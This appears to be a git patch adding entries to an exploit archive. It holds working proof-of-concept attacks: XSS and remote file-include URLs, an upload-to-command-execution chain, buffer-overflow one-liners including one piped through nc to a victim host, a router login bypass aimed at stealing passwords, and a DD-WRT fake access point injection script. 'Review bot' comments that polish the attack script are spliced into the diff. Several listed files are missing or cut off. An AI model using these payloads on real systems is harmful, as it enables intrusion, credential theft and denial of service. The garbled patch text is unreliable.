From b6fddc2460e1a30a589587868c2cf01257fd7788 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Thu, 13 Mar 2014 04:29:24 +0000 Subject: [PATCH] Updated 03_13_2014 --- files.csv | 25 ++++++ platforms/asp/webapps/32184.txt | 7 ++ platforms/asp/webapps/32185.txt | 7 ++ platforms/hardware/webapps/28283.txt | 7 ++ platforms/hardware/webapps/32204.txt | 17 ++++ platforms/linux/local/27425.txt | 13 +++ platforms/linux/remote/32133.txt | 9 ++ platforms/multiple/dos/32192.txt | 10 +++ platforms/multiple/dos/32193.txt | 9 ++ platforms/multiple/dos/32194.txt | 11 +++ platforms/multiple/dos/32195.txt | 11 +++ platforms/multiple/remote/32189.py | 126 +++++++++++++++++++++++++++ platforms/php/webapps/32186.txt | 10 +++ platforms/php/webapps/32187.txt | 10 +++ platforms/php/webapps/32188.txt | 26 ++++++ platforms/php/webapps/32190.txt | 9 ++ platforms/php/webapps/32191.txt | 8 ++ platforms/php/webapps/32196.txt | 9 ++ platforms/php/webapps/32198.txt | 9 ++ platforms/php/webapps/32199.txt | 9 ++ platforms/php/webapps/32200.txt | 9 ++ platforms/php/webapps/32201.txt | 9 ++ platforms/php/webapps/32202.txt | 9 ++ platforms/php/webapps/32203.txt | 9 ++ platforms/windows/local/32205.txt | 64 ++++++++++++++ platforms/windows/remote/32197.pl | 50 +++++++++++ 26 files changed, 492 insertions(+) create mode 100755 platforms/asp/webapps/32184.txt create mode 100755 platforms/asp/webapps/32185.txt create mode 100755 platforms/hardware/webapps/28283.txt create mode 100755 platforms/hardware/webapps/32204.txt create mode 100755 platforms/linux/local/27425.txt create mode 100755 platforms/linux/remote/32133.txt create mode 100755 platforms/multiple/dos/32192.txt create mode 100755 platforms/multiple/dos/32193.txt create mode 100755 platforms/multiple/dos/32194.txt create mode 100755 platforms/multiple/dos/32195.txt create mode 100755 platforms/multiple/remote/32189.py create mode 100755 platforms/php/webapps/32186.txt create mode 100755 platforms/php/webapps/32187.txt create mode 100755 platforms/php/webapps/32188.txt create mode 100755 
platforms/php/webapps/32190.txt create mode 100755 platforms/php/webapps/32191.txt create mode 100755 platforms/php/webapps/32196.txt create mode 100755 platforms/php/webapps/32198.txt create mode 100755 platforms/php/webapps/32199.txt create mode 100755 platforms/php/webapps/32200.txt create mode 100755 platforms/php/webapps/32201.txt create mode 100755 platforms/php/webapps/32202.txt create mode 100755 platforms/php/webapps/32203.txt create mode 100755 platforms/windows/local/32205.txt create mode 100755 platforms/windows/remote/32197.pl
diff --git a/files.csv b/files.csv
index af8b0bd05..0b1f0d615 100755
--- a/files.csv
+++ b/files.csv
@@ -24493,6 +24493,7 @@ id,file,description,date,author,platform,type,port
 27422,platforms/php/webapps/27422.txt,"CyBoards PHP Lite 1.21/1.25 Post.PHP SQL Injection Vulnerability",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0
 27423,platforms/php/webapps/27423.txt,"DSCounter 1.2 Index.PHP SQL Injection Vulnerability",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0
 27424,platforms/php/webapps/27424.txt,"DSDownload 1.0 - Multiple SQL-Injection Vulnerabilities",2006-03-15,"Aliaksandr Hartsuyeu",php,webapps,0
+27425,platforms/linux/local/27425.txt,"Zoo 2.10 - Parse.c Local Buffer Overflow Vulnerability",2006-03-16,"Josh Bressers",linux,local,0
 27426,platforms/linux/local/27426.txt,"Zoo 2.10 Parse.c Local Buffer Overflow Vulnerability",2006-03-16,"Josh Bressers",linux,local,0
 27427,platforms/php/webapps/27427.txt,"Contrexx CMS 1.0.x Index.PHP Cross-Site Scripting Vulnerability",2006-03-16,Soot,php,webapps,0
 27428,platforms/hardware/remote/27428.rb,"D-Link Devices Unauthenticated Remote Command Execution",2013-08-08,metasploit,hardware,remote,0
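Review bot: The added row 27425 is a near-duplicate of the existing row 27426 directly below it (same title apart from a hyphen, same date, author, platform and type), and the added row 28283 in the next hunk has the same relationship to the existing row 28285, differing only in the platform directory and the hyphen. If both rows in each pair are meant to stay, their descriptions should say how they differ; otherwise one of each pair should be removed so the index does not list the same advisory twice. This is based on the visible rows only; the referenced text files are not compared here.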
@@ -25319,6 +25320,7 @@ id,file,description,date,author,platform,type,port
 28280,platforms/php/webapps/28280.txt,"wwwThreads Calendar.PHP Cross-Site Scripting Vulnerability",2006-07-26,l2odon,php,webapps,0
 28281,platforms/php/webapps/28281.txt,"phpbb-auction 1.x auction_room.php ar Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0
 28282,platforms/php/webapps/28282.txt,"phpbb-auction 1.x auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0
+28283,platforms/hardware/webapps/28283.txt,"Zyxel Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,hardware,webapps,0
 28284,platforms/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 ActiveX Control (IcoLaunch) File Execution",2013-09-15,blake,windows,remote,0
 28285,platforms/php/webapps/28285.txt,"Zyxel Prestige 660H-61 ADSL Router RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,php,webapps,0
 28286,platforms/windows/dos/28286.txt,"Microsoft Internet Explorer 6.0 NDFXArtEffects Stack Overflow Vulnerability",2006-07-27,hdm,windows,dos,0
@@ -28912,6 +28914,7 @@ id,file,description,date,author,platform,type,port
 32130,platforms/php/webapps/32130.txt,"DEV Web Management System 1.5 Multiple Input Validation Vulnerabilities",2008-07-30,Dr.Crash,php,webapps,0
 32131,platforms/php/webapps/32131.txt,"ClipSharePro <= 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps,0
 32132,platforms/windows/remote/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,remote,0
+32133,platforms/linux/remote/32133.txt,"libxslt 1.1.x - RC4 Encryption and Decryption Functions Buffer Overflow Vulnerability",2008-07-31,"Chris Evans",linux,remote,0
 32134,platforms/php/webapps/32134.txt,"H0tturk Panel 'gizli.php' Remote File Include Vulnerability",2008-07-31,U238,php,webapps,0
 32135,platforms/php/webapps/32135.txt,"common solutions csphonebook 1.02 'index.php' Cross Site Scripting Vulnerability",2008-07-31,"Ghost Hacker",php,webapps,0
 32136,platforms/osx/dos/32136.html,"Apple Mac OS X 10.x CoreGraphics Multiple Memory Corruption Vulnerabilities",2008-07-31,"Michal Zalewski",osx,dos,0
@@ -28960,3 +28963,25 @@ id,file,description,date,author,platform,type,port
 32181,platforms/php/webapps/32181.txt,"Battle.net Clan Script 1.5.x 'index.php' Multiple SQL Injection Vulnerabilities",2008-08-06,IRCRASH,php,webapps,0
 32182,platforms/php/webapps/32182.txt,"phpKF-Portal 1.10 baslik.php tema_dizin Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0
 32183,platforms/php/webapps/32183.txt,"phpKF-Portal 1.10 anket_yonetim.php portal_ayarlarportal_dili Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0
+32184,platforms/asp/webapps/32184.txt,"KAPhotoservice order.asp page Parameter XSS",2008-08-06,by_casper41,asp,webapps,0
+32185,platforms/asp/webapps/32185.txt,"KAPhotoservice search.asp filename Parameter XSS",2008-08-06,by_casper41,asp,webapps,0
+32186,platforms/php/webapps/32186.txt,"Quate CMS 0.3.4 Multiple Cross-Site Scripting Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0
+32187,platforms/php/webapps/32187.txt,"com_utchat component Mambo and Joomla! 
Component 0.2 Multiple Remote File Include Vulnerabilities",2008-08-06,by_casper41,php,webapps,0
+32188,platforms/php/webapps/32188.txt,"Multiple WebmasterSite Products Remote Command Execution Vulnerability",2008-08-06,otmorozok428,php,webapps,0
+32189,platforms/multiple/remote/32189.py,"DD-WRT Site Survey SSID Script Injection Vulnerability",2008-08-06,"Rafael Dominguez Vega",multiple,remote,0
+32190,platforms/php/webapps/32190.txt,"Kshop 2.22 'kshop_search.php' Cross-Site Scripting Vulnerability",2008-08-06,Lostmon,php,webapps,0
+32191,platforms/php/webapps/32191.txt,"PHP-Nuke Kleinanzeigen Module 'lid' Parameter SQL Injection Vulnerability",2008-08-06,Lovebug,php,webapps,0
+32192,platforms/multiple/dos/32192.txt,"Combat Evolved 1.0.7.0615 - Multiple Denial Of Service Vulnerabilities",2008-08-06,"Luigi Auriemma",multiple,dos,0
+32193,platforms/multiple/dos/32193.txt,"OpenVMS 8.3 Finger Service Stack Based Buffer Overflow Vulnerability",2008-08-07,"Shaun Colley",multiple,dos,0
+32194,platforms/multiple/dos/32194.txt,"NoticeWare Email Server 4.6 NG LOGIN Messages Denial Of Service Vulnerability",2008-08-06,Antunes,multiple,dos,0
+32195,platforms/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 LIST Command Remote Denial of Service Vulnerability",2008-08-08,Antunes,multiple,dos,0
+32196,platforms/php/webapps/32196.txt,"RMSOFT MiniShop 1.0 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-09,Lostmon,php,webapps,0
+32197,platforms/windows/remote/32197.pl,"Maxthon Browser 1.x Content-Type Buffer Overflow Vulnerability",2008-08-09,DATA_SNIPER,windows,remote,0
+32198,platforms/php/webapps/32198.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS friends.php uid Parameter XSS",2008-08-09,Lostmon,php,webapps,0
+32199,platforms/php/webapps/32199.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS seutubo.php uid Parameter XSS",2008-08-09,Lostmon,php,webapps,0
+32200,platforms/php/webapps/32200.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS album.php uid 
Parameter XSS",2008-08-09,Lostmon,php,webapps,0
+32201,platforms/php/webapps/32201.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS scrapbook.php uid Parameter XSS",2008-08-09,Lostmon,php,webapps,0
+32202,platforms/php/webapps/32202.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS index.php uid Parameter XSS",2008-08-09,Lostmon,php,webapps,0
+32203,platforms/php/webapps/32203.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS tribes.php uid Parameter XSS",2008-08-09,Lostmon,php,webapps,0
+32204,platforms/hardware/webapps/32204.txt,"ZyXEL Router P-660HN-T1A - Login Bypass",2014-03-12,"Michael Grifalconi",hardware,webapps,0
+32205,platforms/windows/local/32205.txt,"Huawei Technologies eSpace Meeting Service 1.0.0.23 - Local Privilege Escalation",2014-03-12,LiquidWorm,windows,local,0
diff --git a/platforms/asp/webapps/32184.txt b/platforms/asp/webapps/32184.txt
new file mode 100755
index 000000000..9ee1e14bc
--- /dev/null
+++ b/platforms/asp/webapps/32184.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/30567/info
+
+KAPhotoservice is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+ http://example.com/path/order.asp?cat=&apage=&albumid=&page=">
\ No newline at end of file
diff --git a/platforms/asp/webapps/32185.txt b/platforms/asp/webapps/32185.txt
new file mode 100755
index 000000000..a4e3b38a1
--- /dev/null
+++ b/platforms/asp/webapps/32185.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/30567/info
+
+KAPhotoservice is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://example.com/path/search.asp?filename=">
\ No newline at end of file
diff --git a/platforms/hardware/webapps/28283.txt b/platforms/hardware/webapps/28283.txt
new file mode 100755
index 000000000..24aea9997
--- /dev/null
+++ b/platforms/hardware/webapps/28283.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/19180/info
+
+The Zyxel Prestige 660H-61 ADSL Router is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/Forms/rpSysAdmin?a=%3Cscript%3Ealert('www.eazel.es')%3C/script%3E
\ No newline at end of file
diff --git a/platforms/hardware/webapps/32204.txt b/platforms/hardware/webapps/32204.txt
new file mode 100755
index 000000000..a89bdf0cf
--- /dev/null
+++ b/platforms/hardware/webapps/32204.txt
@@ -0,0 +1,17 @@
+# Exploit Title: ZyXEL Router P-660HN-T1A - Login Bypass
+# Date: 11/03/2013
+# Exploit Author: Michael Grifalconi
+# Vendor Homepage: http://www.zyxel.com/products_services/p_660hn_txa_series.shtml?t=p
+# Version: 3.40(BYF.5) - (Last avaiable)
+
+If someone is logged on the web interface of the router, the attacker could
+bypass the login form by going straigt to the default page of administration.
+(The root page will ask for password)
+
+The vulnerability works from any IP address, the router seems to be 'free to access' from any IP
+when a legit user is logged in.
+
+http://ROUTER-IP/rpSys.html
+
+You may setup a bot that checks if someone is logged and if so, download the configuration backup
+to obtain the password.
\ No newline at end of file
diff --git a/platforms/linux/local/27425.txt b/platforms/linux/local/27425.txt
new file mode 100755
index 000000000..f4fccf24c
--- /dev/null
+++ b/platforms/linux/local/27425.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/17126/info
+
+Zoo is prone to a local buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer.
+
+An attacker can exploit this issue to execute arbitrary code in the context of the victim user running the affected application to potentially gain elevated privileges.
+
+mkdir `perl -e 'print "A"x254'`
+cd `perl -e 'print "A"x254'`
+mkdir `perl -e 'print "A"x254'`
+cd `perl -e 'print "A"x254'`
+touch feh
+cd ../..
+zoo a arch.zoo `perl -e 'print "A"x254 . "/" . "A"x254 . "/feh"'`
\ No newline at end of file
diff --git a/platforms/linux/remote/32133.txt b/platforms/linux/remote/32133.txt
new file mode 100755
index 000000000..b7d533cb6
--- /dev/null
+++ b/platforms/linux/remote/32133.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30467/info
+
+The 'libxslt' library is prone to a heap-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.
+
+An attacker may exploit this issue to execute arbitrary code with the privileges of the user running an application that relies on the affected library. Failed exploit attempts will likely result in denial-of-service conditions.
+
+This issue affects libxslt 1.1.8 to 1.1.24.
+
+http://www.exploit-db.com/sploits/32133.xsl
\ No newline at end of file
diff --git a/platforms/multiple/dos/32192.txt b/platforms/multiple/dos/32192.txt
new file mode 100755
index 000000000..11fa49691
--- /dev/null
+++ b/platforms/multiple/dos/32192.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30582/info
+
+Halo: Combat Evolved is prone to multiple remote denial-of-service vulnerabilities because the application fails to properly handle specially crafted network packets.
+
+An attacker may exploit these issues to crash the affected application, denying service to legitimate users.
+
+Halo: Combat Evolved 1.0.7.0615 is vulnerable; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/32192-1.zip
+http://www.exploit-db.com/sploits/32192-2.zip
\ No newline at end of file
diff --git a/platforms/multiple/dos/32193.txt b/platforms/multiple/dos/32193.txt
new file mode 100755
index 000000000..0117ff39b
--- /dev/null
+++ b/platforms/multiple/dos/32193.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30589/info
+
+The finger service ('fingerd') on OpenVMS is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input.
+
+Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed attempts will likely cause denial-of-service conditions.
+
+We were not told which versions are affected. We will update this BID as more information emerges.
+
+echo `perl -e 'print "a"x1000'` | nc -v victim.example.com 79
\ No newline at end of file
diff --git a/platforms/multiple/dos/32194.txt b/platforms/multiple/dos/32194.txt
new file mode 100755
index 000000000..810d507d6
--- /dev/null
+++ b/platforms/multiple/dos/32194.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/30605/info
+
+NoticeWare Email Server NG is prone to a denial-of-service vulnerability because it fails to handle user-supplied input.
+
+Remote attackers can exploit this issue to deny service to legitimate users.
+
+NoticeWare Email Server NG 4.6.2 and 4.6.3 are vulnerable; other versions may also be affected.
+
+The following exploit example is available:
+
+A001 LOGIN Ax5000 AAAAA
\ No newline at end of file
diff --git a/platforms/multiple/dos/32195.txt b/platforms/multiple/dos/32195.txt
new file mode 100755
index 000000000..0444662c1
--- /dev/null
+++ b/platforms/multiple/dos/32195.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/30606/info
+
+WinGate is prone to a remote denial-of-service vulnerability affecting the application's IMAP email server.
+
+Exploiting this issue will consume computer resources and deny access to legitimate users.
+
+WinGate 6.2.2 is vulnerable; other versions may also be affected.
+
+The following example command is available:
+
+LIST Ax1000 *
\ No newline at end of file
diff --git a/platforms/multiple/remote/32189.py b/platforms/multiple/remote/32189.py
new file mode 100755
index 000000000..a09c532e1
--- /dev/null
+++ b/platforms/multiple/remote/32189.py
@@ -0,0 +1,126 @@
+source: http://www.securityfocus.com/bid/30573/info
+
+DD-WRT is prone to a script-injection vulnerability because it fails to adequately sanitize user-supplied data to the 'Site Survey' section of the administrative web interface.
+
+Attackers can exploit this issue to execute arbitrary script code in the DD-WRT web interface.
+
+Versions prior to DD-WRT 24-sp1 are vulnerable.
+
+#!/usr/bin/env python
+#
+# This tool is distributed under a BSD licence. A copy of this
+# should have been included with this file.
+#
+# Copyright (c) 2008, Rafael Dominguez Vega.
+#
+# This tool is designed for the purpose of performing security
+# testing only and is not intended to be used for unlawful
+# activities.
+#
+# This tool can be used to check for SSID script injection
+vulnerabilities
+# in different sofware products.
+#
+# Help can be viewed by running this file with --help.
+#
+#
+# Author: Rafael Dominguez Vega
+# Version: 0.0.2
+#
+# Further information: rafael ({dot}) dominguez-vega <(at)>
+mwrinfosecurity {(dot)} com
+#
+
+import optparse
+import sys
+import os
+import time
+from optparse import OptionParser
+
+class OptionParser (optparse.OptionParser):
+
+ def check_required (self, opt):
+ option = self.get_option(opt)
+
+ if getattr(self.values, option.dest) is None:
+ self.error("%s option not supplied" % option)
+
+parser = OptionParser()
+parser.add_option("-i", "--interface1", action="store",
+dest="ap1",help="Network interface for first Access Point (required)")
+parser.add_option("-j", "--interface2", action="store", dest="ap2",
+help="Network interface for second Access Point (required)")
+parser.add_option("-s", "--ssid1", action="store", dest="ssid1",
+help="SSID for first Access Point. Between double quotes (\"\") if
+special characters are used (required)")
+parser.add_option("-t", "--ssid2", action="store", dest="ssid2",
+help="SSID for second Access Point. 
Between double quotes (\"\") if
+special characters are used (required)")
+
+(options, args) = parser.parse_args()
+
+parser.check_required("-i")
+if options.ap1:
+ ap1 = options.ap1
+else:
+ sys.exit(0)
+
+parser.check_required("-j")
+if options.ap2:
+ ap2 = options.ap2
+else:
+ sys.exit(0)
+
+parser.check_required("-s")
+if options.ssid1:
+ ssid1 = options.ssid1
+else:
+ sys.exit(0)
+
+parser.check_required("-t")
+if options.ssid2:
+ ssid2 = options.ssid2
+else:
+ sys.exit(0)
+
+
+
+ssid1 = ssid1.replace("<", "\<")
+ssid1 = ssid1.replace(">","\>")
+ssid1 = ssid1.replace("(","\(")
+ssid1 = ssid1.replace(")","\)")
+ssid1 = ssid1.replace("$","\$")
+ssid1 = ssid1.replace("&","\&")
+ssid1 = ssid1.replace(";","\;")
+ssid1 = ssid1.replace("|","\|")
+ssid1 = ssid1.replace("*","\*")
+ssid1 = ssid1.replace(" ","\ ")
+
+ssid2 = ssid2.replace("<", "\<")
+ssid2 = ssid2.replace(">","\>")
+ssid2 = ssid2.replace("(","\(")
+ssid2 = ssid2.replace(")","\)")
+ssid2 = ssid2.replace("$","\$")
+ssid2 = ssid2.replace("&","\&")
+ssid2 = ssid2.replace(";","\;")
+ssid2 = ssid2.replace("|","\|")
+ssid2 = ssid2.replace("*","\*")
+ssid2 = ssid2.replace(" ","\ ")
+
+
+os.system("wlanconfig "+ap1+" destroy")
+os.system("wlanconfig "+ap2+" destroy")
+print("\n Initialising fake APs...\n")
+
+os.system("wlanconfig "+ap1+" create wlandev wifi0 wlanmode ap bssid")
+time.sleep(3)
+os.system("iwconfig "+ap1+" essid "+ssid1)
+time.sleep(2)
+os.system("wlanconfig "+ap2+" create wlandev wifi0 wlanmode ap bssid")
+time.sleep(3)
+os.system("iwconfig "+ap2+" essid "+ssid2)
+
+print("Payload: "+ssid1+ssid2)
+
+
+
diff --git a/platforms/php/webapps/32186.txt b/platforms/php/webapps/32186.txt
new file mode 100755
index 000000000..4bdd940fc
--- /dev/null
+++ b/platforms/php/webapps/32186.txt
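Review bot: The `os.system("iwconfig "+ap1+" essid "+ssid1)` call and its five siblings near the end of the hunk build a shell command by string concatenation, and the hand-rolled backslash list above them escapes ten characters but not double quotes, single quotes, backticks or newlines, so an argument containing any of those is still interpreted by the shell; passing the arguments as a list to `subprocess.call` (imported at the top next to `os`) keeps the shell out of the path entirely and makes the twenty `replace` lines unnecessary, as sketched below. The `"\<"`-style literals in those lines are also unrecognised escape sequences that newer Python versions warn about. Separately, `from optparse import OptionParser` is immediately shadowed by the `class OptionParser` defined below it and can be dropped, and each `parser.check_required(...)` is followed by an `if options.x: ... else: sys.exit(0)` that only fires on an empty string and then exits with status 0 and no message, so it would be cleaner to have `check_required` call `self.error` on empty values as well and remove the four silent exits.
```python
# … unchanged: option parsing and required-option checks …
subprocess.call(["wlanconfig", ap1, "destroy"])
subprocess.call(["wlanconfig", ap2, "destroy"])
print("\n Initialising fake APs...\n")
subprocess.call(["wlanconfig", ap1, "create", "wlandev", "wifi0", "wlanmode", "ap", "bssid"])
time.sleep(3)
subprocess.call(["iwconfig", ap1, "essid", ssid1])
time.sleep(2)
subprocess.call(["wlanconfig", ap2, "create", "wlandev", "wifi0", "wlanmode", "ap", "bssid"])
time.sleep(3)
subprocess.call(["iwconfig", ap2, "essid", ssid2])
```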
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30570/info
+
+Quate CMS is prone to multiple cross-site scripting vulnerabilities because it fails to adequately sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Quate CMS 0.3.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/admin/includes/themes/default/header.php?page_area=[XSS]
+http://www.example.com/path/admin/includes/themes/default/header.php?page_header=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/32187.txt b/platforms/php/webapps/32187.txt
new file mode 100755
index 000000000..3a47c0016
--- /dev/null
+++ b/platforms/php/webapps/32187.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30571/info
+
+The com_utchat component for Mambo and Joomla! is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues can allow an attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+These issues affect com_utchat 0.9.2; other versions may also be affected.
+
+http://www.example.com/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=[Sh3LL]
+http://www.example.com/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/SetupDecorator.php?aFile=[Sh3LL]
\ No newline at end of file
diff --git a/platforms/php/webapps/32188.txt b/platforms/php/webapps/32188.txt
new file mode 100755
index 000000000..95d1ed791
--- /dev/null
+++ b/platforms/php/webapps/32188.txt
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/30572/info
+
+Multiple WebmasterSite products are prone to a remote shell command-execution vulnerability because the applications fail to sufficiently sanitize user-supplied data.
+
+Successfully exploiting this issue will allow an attacker to execute arbitrary commands in the context of the affected application.
+
+This issue affects the following products:
+
+WSN Forum 4.1.43
+WSN Knowledge Base 4.1.36
+WSN Links 4.1.44
+WSN Gallery 4.1.30
+
+Note that previous versions may also be vulnerable.
+
+Avatar evil.jpg source:
+
+
+Enter to upload:
+http://www.example.com/forum/profile.php?action=editprofile&id=[Your User ID]
+
+See the avatar name at your profile.
+
+Upload evil avatar and go to:
+http://www.example.com/index.php?custom=yes&TID=../../attachments/avatars/[Avatar Name]&ext=jpg&cmd=ls -al
+
diff --git a/platforms/php/webapps/32190.txt b/platforms/php/webapps/32190.txt
new file mode 100755
index 000000000..da4dde881
--- /dev/null
+++ b/platforms/php/webapps/32190.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30576/info
+
+Kshop is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Kshop 2.22 is vulnerable; other versions may also be affected.
+
+
&Submit=Go%21&idc=0">&key=">
\ No newline at end of file
diff --git a/platforms/php/webapps/32198.txt b/platforms/php/webapps/32198.txt
new file mode 100755
index 000000000..58e739cb9
--- /dev/null
+++ b/platforms/php/webapps/32198.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30618/info
+
+Yogurt Social Network is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Yogurt Social Network 3.2 rc1 is affected; other versions may also be vulnerable.
+
+http://www.example.com/[cms]/htdocs/modules/yogurt/friends.php?uid=1">
\ No newline at end of file
diff --git a/platforms/php/webapps/32199.txt b/platforms/php/webapps/32199.txt
new file mode 100755
index 000000000..e62f7bf06
--- /dev/null
+++ b/platforms/php/webapps/32199.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30618/info
+
+Yogurt Social Network is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Yogurt Social Network 3.2 rc1 is affected; other versions may also be vulnerable.
+
+http://www.example.com/[cms]/htdocs/modules/yogurt/seutubo.php?uid=1">
\ No newline at end of file
diff --git a/platforms/php/webapps/32200.txt b/platforms/php/webapps/32200.txt
new file mode 100755
index 000000000..fc0a50923
--- /dev/null
+++ b/platforms/php/webapps/32200.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30618/info
+
+Yogurt Social Network is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Yogurt Social Network 3.2 rc1 is affected; other versions may also be vulnerable.
+
+http://www.example.com/[cms]/htdocs/modules/yogurt/album.php?uid=1">
\ No newline at end of file
diff --git a/platforms/php/webapps/32201.txt b/platforms/php/webapps/32201.txt
new file mode 100755
index 000000000..ffe376784
--- /dev/null
+++ b/platforms/php/webapps/32201.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30618/info
+
+Yogurt Social Network is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Yogurt Social Network 3.2 rc1 is affected; other versions may also be vulnerable.
+
+http://www.example.com/[cms]/htdocs/modules/yogurt/scrapbook.php?uid=1">
\ No newline at end of file
diff --git a/platforms/php/webapps/32202.txt b/platforms/php/webapps/32202.txt
new file mode 100755
index 000000000..9af4f7547
--- /dev/null
+++ b/platforms/php/webapps/32202.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30618/info
+
+Yogurt Social Network is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Yogurt Social Network 3.2 rc1 is affected; other versions may also be vulnerable.
+
+http://www.example.com/[cms]/htdocs/modules/yogurt/index.php?uid=1">
\ No newline at end of file
diff --git a/platforms/php/webapps/32203.txt b/platforms/php/webapps/32203.txt
new file mode 100755
index 000000000..bcd5cd750
--- /dev/null
+++ b/platforms/php/webapps/32203.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30618/info
+
+Yogurt Social Network is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Yogurt Social Network 3.2 rc1 is affected; other versions may also be vulnerable.
+
+http://www.example.com/[cms]/htdocs/modules/yogurt/tribes.php?uid=1">
\ No newline at end of file
diff --git a/platforms/windows/local/32205.txt b/platforms/windows/local/32205.txt
new file mode 100755
index 000000000..3aa5ab233
--- /dev/null
+++ b/platforms/windows/local/32205.txt
@@ -0,0 +1,64 @@
+?
+Huawei Technologies eSpace Meeting Service 1.0.0.23 Local Privilege Escalation
+
+
+Vendor: Huawei Technologies Co., Ltd.
+Product web page: http://www.huawei.com
+Affected version: 1.0.0.23 (V100R001C03SPC201B050)
+
+Summary: Huawei's eSpace Meeting solution fully meets the needs of enterprise
+customers for an integrated daily collaboration system by integrating the
+conference server, conference video terminal, conference user authorization,
+and teleconference.
+
